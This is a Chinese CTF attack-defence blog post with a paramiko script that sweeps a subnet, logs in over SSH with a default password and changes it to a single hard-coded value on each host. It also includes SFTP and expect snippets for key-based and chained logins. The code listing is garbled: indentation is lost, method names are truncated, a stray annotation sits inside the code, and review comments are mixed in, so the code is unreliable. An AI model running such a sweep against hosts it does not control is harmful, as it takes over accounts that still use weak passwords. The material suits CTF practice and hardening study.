ctf之AWD(1) ssh弱口令
批量修改ssh初始密码
要点
passwd的--stdin参数ubuntu不支持,chpasswd命令需要root权限
echo "root" | passwd --stdin apache
更改密码用sh -c passwd命令,不直接用passwd
控制初始登录ssh的欢迎banner
控制收发包速度和 CRLF ,通过jupyter快速调试
git paramiko源码 ,查看example和doc
git clone https://github.com/paramiko/paramiko.git
pexpect库的pexpect.spawn在Windows不可用
Python自动化运维:技术与最佳实践:
python3 script
# -*- coding:utf-8 -*-
import paramiko
import time
import queue
'''
passwd的--stdin参数ubuntu不⽀持
chpasswd
joe:abcdef
echo "root" |passwd --stdin apache
'''
# Account names known to the script. Only USER[0] is referenced, and only in
# the commented-out exec command inside ssh_exec.
USER = [
    "root",
    "apache",
    "root1",
    "ctf",
    "student",
]

# Current (initial) password that ssh_invoke_shell sends first to the passwd prompt.
PASSWORD_SSH = "123456"

# Replacement password. It is one constant, so every host processed by
# change_ssh ends up with the same new password.
# NOTE(review): both credentials live in source; consider reading them from the
# environment or a prompt and generating a distinct value per host.
PASSWORD_NEW = "aser1234.."

# ANSI escape sequences used as prefixes on console messages
# (bold green / bold red on a black background).
COLOR_GREEN = "\033[1;32;40m"
COLOR_RED = "\033[1;31;40m"
def get_ip(ip1, ip2):
    """Return a FIFO queue of addresses 192.168.232.<n> for n in [ip1, ip2).

    Args:
        ip1: First last-octet value (inclusive); converted with int().
        ip2: End last-octet value (exclusive); converted with int().

    Returns:
        A queue.Queue holding the address strings in ascending order. The
        queue is empty when ip1 >= ip2.
    """
    pending = queue.Queue()
    octet, stop = int(ip1), int(ip2)
    # Half-open range: the end value itself is never enqueued.
    while octet < stop:
        pending.put('192.168.232.' + str(octet))
        octet += 1
    return pending
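def write_ip(lfile, data):
    """Append one "<data>    <timestamp>" line to the record file *lfile*.

    Callers use this to record each host whose password was changed, so the
    file is the only trace of which machines now carry the new credential.

    Args:
        lfile: Path of the record file; created if it does not exist.
        data: Text to record (callers pass the host address as a string).

    Failures are reported on the console and not raised, matching the
    original best-effort behaviour.
    """
    try:
        # Append instead of 'w+': 'w+' truncated the file on every call, so
        # only the last host of a run survived. The context manager also
        # closes the handle when the write itself fails.
        with open(lfile, 'a', encoding='utf-8') as f:
            # The listing shows a truncated `ime()` here; time.ctime() is the
            # call that fits the fragment and the imported `time` module.
            f.write(data + '    ' + time.ctime() + '\n')
    except Exception as e:
        print(COLOR_RED + '[-]:写⼊失败' + str(e))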
# ssh_exec(ip, port): non-interactive variant. It creates a paramiko client,
# runs one command and, when the command produced output, prints it and
# records the host with write_ip.
#
# NOTE(review): this listing was damaged during extraction and cannot run as
# shown:
#   - indentation is lost, and the outer `try:` has no visible handler;
#   - no connect call is visible between client creation and command
#     execution;
#   - `command1` is assigned only in a commented-out line;
#   - `_command(...)` and `ad()` look like truncated names, presumably
#     ssh.exec_command(...) and stdout.read() / stderr.read() - confirm
#     against the original script.
def ssh_exec(ip, port):
ssh = paramiko.SSHClient()
# AutoAddPolicy accepts any host key the client has not seen before, so the
# server is not authenticated. Whatever answers on ip:port would receive the
# current password and the new one. Where host keys can be collected up front,
# load them and use paramiko.RejectPolicy instead.
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
try:
# The commented-out command pipes the new password into `passwd --stdin`. The
# page's own notes say Ubuntu's passwd lacks --stdin, and a password placed in
# an `echo` argument can show up in process listings and audit logs.
#command1 = 'echo %s|passwd  --stdin %s' % (PASSWORD_NEW, USER[0])
stdin, stdout, stderr = _command(command1)
out, err = ad(), ad()
# Success is inferred only from stdout being non-empty; `err` is never
# inspected and no exit status is checked.
if out:
print(COLOR_GREEN +'[+]:'+str(ip)+'\n'+ out.decode('utf-8').strip())
# NOTE(review): 'd:/' is a directory, not a file; the file name appears to
# have been lost from the listing.
write_ip('d:/',str(ip))
else:
print(COLOR_RED +'[-]: 命令执⾏失败')
except paramiko.ssh_exception.AuthenticationException as e:
print(COLOR_RED +'[-]:'+str(ip)+'账号密码错误!')
# The next line is a stray page annotation ("root's initial password") that
# was merged into the code; it is not a statement of the original script.
root的初始密码
pass
# ssh_invoke_shell(ip, port): interactive variant. It opens a shell channel and
# drives `sh -c passwd` by sending the current password once and the new
# password twice, then records the host with write_ip.
#
# NOTE(review): this listing was damaged during extraction and cannot run as
# shown:
#   - indentation is lost;
#   - no connect call is visible before invoke_shell();
#   - `v_ready():`, `v(1024)...` and `v_exit_status()` look like truncated
#     names, presumably interact.recv_ready(), interact.recv(1024) and
#     interact.recv_exit_status() - confirm against the original script.
def ssh_invoke_shell(ip, port):
ssh = paramiko.SSHClient()
# AutoAddPolicy accepts any host key the client has not seen before, so the
# server is not authenticated before both passwords are typed into its shell.
# Where host keys can be collected up front, load them and use
# paramiko.RejectPolicy instead.
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
interact = ssh.invoke_shell()
# Channel operations give up after 10 seconds.
interact.settimeout(10)
# Helper: send one line, wait half a second, then read what the shell
# returned. The fixed sleep is the pacing the page's notes refer to
# ("control send/receive speed and CRLF").
def send_recv(data):
interact.send(data)
time.sleep(0.5)
v_ready():
v(1024).decode('utf-8'))
else:
print('recv failed')
# Prompt sequence for passwd: current password, new password, confirmation.
# Each line ends with '\r'.
send_recv('sh -c passwd\r')
send_recv(PASSWORD_SSH +'\r')
send_recv(PASSWORD_NEW +'\r')
send_recv(PASSWORD_NEW +'\r')
# The host is recorded unconditionally: nothing above checks whether passwd
# accepted the change, so the record can list hosts that still have the old
# password.
# NOTE(review): 'd:/' is a directory, not a file; the file name appears to
# have been lost from the listing.
write_ip('d:/',str(ip))
interact.shutdown(2)# 0: stop receiving  1: stop sending  2: stop both receiving and sending. The source line ends with the fragment "it_status_ready():", apparently a truncated `if ...exit_status_ready():` line - confirm
print("EXIT :", v_exit_status())
else:
pass
except paramiko.ssh_exception.AuthenticationException as e:
print('[-]:'+'账号密码错误!')
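def change_ssh(ip1, ip2):
    """Run the password change on each address produced by get_ip(ip1, ip2).

    Hosts are processed one at a time, in queue order, on port 22. An error
    on one host is printed and the loop moves on to the next host.

    Args:
        ip1: First last-octet value (inclusive), passed to get_ip.
        ip2: End last-octet value (exclusive), passed to get_ip.
    """
    tmp_queue = get_ip(ip1, ip2)
    while True:
        # Dequeue outside the per-host try block. The listing shows a
        # truncated `_nowait()` here; as written it raised NameError on every
        # pass, the handler swallowed it, and the queue never shrank, so the
        # loop could not terminate.
        try:
            ip = tmp_queue.get_nowait()
        except queue.Empty:
            break
        try:
            # Alternative kept from the original: ssh_exec(ip, 22)
            ssh_invoke_shell(ip, 22)
        except Exception as e:
            print(COLOR_RED + '[-]:' + 'error' + str(e))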
if __name__ == '__main__':
    # Alternative range kept from the original: change_ssh(129, 130)
    # get_ip treats the end value as exclusive, so this call processes only
    # 192.168.232.141.
    change_ssh(141, 142)
'''
#sftp
transport = paramiko.Transport(('192.168.1.111',22))
sftp = paramiko.SFTPClient.from_transport(transport)
# 将/ 上传至服务器 /
sftp.put('/', '/')
# 将/ 下载到本地 /
sftp.get('/', '/')
transport.close()
'''
##基于公钥密钥上传下载
'''
private_key = paramiko.RSAKey.from_private_key_file('/root/.ssh/id_rsa')
transport = paramiko.Transport(('10.0.3.56', 22))
sftp = paramiko.SFTPClient.from_transport(transport)
# 将/ 上传至服务器 /
sftp.put('/', '/')
# 将/ 下载到本地 /
sftp.get('/', '/')
transport.close()
'''
'''
###自动ssh/scp脚本
如果需要从A,到B,然后才能够到C,那么需要ssh和scp两次,是比较麻烦的。ssh自动登录:
#!/usr/bin/expect -f
set timeout -1
spawn ssh root@B
expect "password:"
send "pppppp\r"
expect "]*"
send "ssh root@C\r"
expect "password:"
send "pppppp\r"
interact
'''